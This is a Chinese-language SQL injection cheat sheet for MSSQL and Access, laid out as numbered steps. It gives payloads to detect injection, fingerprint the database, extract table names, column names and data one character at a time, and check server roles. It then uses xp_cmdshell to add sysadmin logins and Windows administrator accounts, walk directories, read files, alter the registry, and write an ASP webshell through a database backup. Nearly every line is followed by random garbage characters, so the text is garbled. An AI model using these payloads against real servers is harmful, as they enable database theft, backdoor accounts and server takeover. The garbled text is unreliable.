1.判断是否有注入;and 1=1 ;and 1=2 bJ,�=yB+0�
2.初步判断是否是mssql ;and user>0 <R�~~�yW:H
e�V�CkPv�*
3.注入参数是字符'and [查询条件] and ''=' ?;KJ
(�@Va
6�B;_�uIq5
4.搜索时没过滤参数的'and [查询条件] and '%25'=' P=sK�+}5`q
PM@�s}(��
5.判断数据库系统 <1g�1hqK3�
E-U;8�cOMv
;and (select count(*) from sysobjects)>0 mssql S���K�c�
T
]g-�q�WSKU
;and (select count(*) from msysobjects)>0 access J�|2H��q�d
c7nk�~K[6
+} !�F(c�
�z7Rcn�r;
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��G�4exk5�
Zn��l>*e/|
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 q=0{E0@9({
�iJa�N�P%N
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 %}]�4Nsd�e
i�8[Y{a��*
9.(1)猜字段的ascii值(access) ��CTbhwY(/
Tk#&Ux�{ZJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 agxSb^ 8tF
L^�al��1T�
(2)猜字段的ascii值(mssql) H��'h4��@S
=�3v
1]7�X
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 b{|�/J�<Fe
p:Ld)U�*��
10.测试权限结构(mssql) :qSi>K�CGh
:Ye#�NPOI�
4FHX#����`
�f(�{-j%�m
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �]I�' xLh`
\PMKmJ�X0O
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >
�%�cW�TC
�]��Y:
W[p
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- %��K7EF_%�
v/�0�0L��R
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- >R�qT7n�8h
y:��[VR�Lo
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- I��^\�bS�
�/2\=��sTd
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- NF)\">�Y�e
ND�9�>`I�5
;and 1=(select IS_MEMBER('db_owner'));-- er7��/BE�&
0�9�;�'z��
tG��^�?fc�
sd@�gEp)L
11.添加mssql和系统的帐户 FQ�~ead36C
H-�
q��P>:
;exec master.dbo.sp_addlogin username;-- E29gn�Yxu8
;exec master.dbo.sp_password null,username,password;-- �� H[��!�Q
Qbt��>}?-�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �~Ow�23�N�
rKs �WS~�U
;exec master.dbo.xp_cmdshell 'net user username password �;s�
B:s9M
U W�)&E�ky
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- FjLv*K[#�d
*�2C�79hi1
;exec master.dbo.xp_cmdshell 'net user username password /add';-- {f�-/,��g~
A�Be�^]HlH
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �!2M�[��
K2o0L5�Lke
*9{Wn7pck/
%T�TL^@1!b
12.(1)遍历目录 e�cI
2]aKi
�{�2*l :�'
;create table dirs(paths varchar(100), id int) iXS-�EB�/
hsVJ&��-#�
;insert dirs exec master.dbo.xp_dirtree 'c:\' Sq�8Q�*���
B�';>�H�k�
;and (select top 1 paths from dirs)>0 T2_�#[bk*d
I�hq@�|�s8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) a;�ow�G/\p
V�?z{UZkR
vyOC�2��c8
`1}�?{�u�d
(2)遍历目录 `�ia��y�h
�)Gp\_(9fc
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��l��LFBop
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 {U�C�<I.5X
;�Owu:}���
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 'CAukk��|�
M�9�jo<�+
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 -/���2$�P�
3b[�+m}UWQ
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �D�!$� =oK
V�yq<T(5��
���glX2L�~
�;��Y&?ixx
13.mssql中的存储过程 V42�*4hskL
�3$y�L+%�i
xp_regenumvalues 注册表根键, 子键 @�`�8 B}
C
�NI�Tx;�iC
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��z'��D{:q
���Qbpl$�L
xp_regread 根键,子键,键值名 Fs�j&�/:
q
�]�`H.�q�V
;exec xp_regread �:�#htOsP
Qr-J-2s�?B
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
7-�g4S]r<
�v oS�"�X
xp_regwrite 根键,子键, 值名, 值类型, 值 G�J_)Cl+5E
~@?-|x�LqQ
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 zXU{p\;)�\
mX�M>6>;y�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >MY�.Fr#.m
17�]���3�1
xp_regdeletevalue 根键,子键,值名 u�gPI1�'f�
+Q�vgpx��>
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �EI�+/%.�,
4
Wd5Go�e:
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 w*P4_=
:%Y
z\d2T%^:g(
�VgTI���2
2.2�a2�.I1
14.mssql的backup创建webshell �3�C[4!>|�
��n(x��lad
use model :bDn.`K�G#
�{^M�Ad�C_
create table cmd(str image); �i��*w-Q=�
5T3>f��w2G
insert into cmd(str) values (''); t%�B!�\�]�
>d�
V��@9�
backup database model to disk='c:\l.asp'; �Vz�m+Ew
_
h`r�jD��d
Kr�G6z#)Uz
.ehvh�MuG|
15.mssql内置函数 Ta�J�n2cC^
��#$C]0]|�
;and (select @@version)>0 获得Windows的版本号 $<mL�2$.L~
R+hS;F nh%
;and user_name()='dbo' 判断当前系统的连接用户是不是sa q�$'�&R��G
�o�x�XW`C<
;and (select user_name())>0 爆当前系统的连接用户 0�BE^��qe
Byvq�w�JY
;and (select db_name())>0 得到当前连接的数据库 �[F{�a-�i-
z9O/MHT[�w
�|Z|�x�M�
tg3J��U��\
16.简洁的webshell O� t<%gj;^
pv SFp-:_
use model o`! :Q!�+
Fe<
t@�W��
create table cmd(str image); ; �2-kQK9
Q��&���Ahr
insert into cmd(str) values (''); e�`1s[� ^B
^O*hs%eO%
backup database model to disk='g:\wwwtest\l.asp';
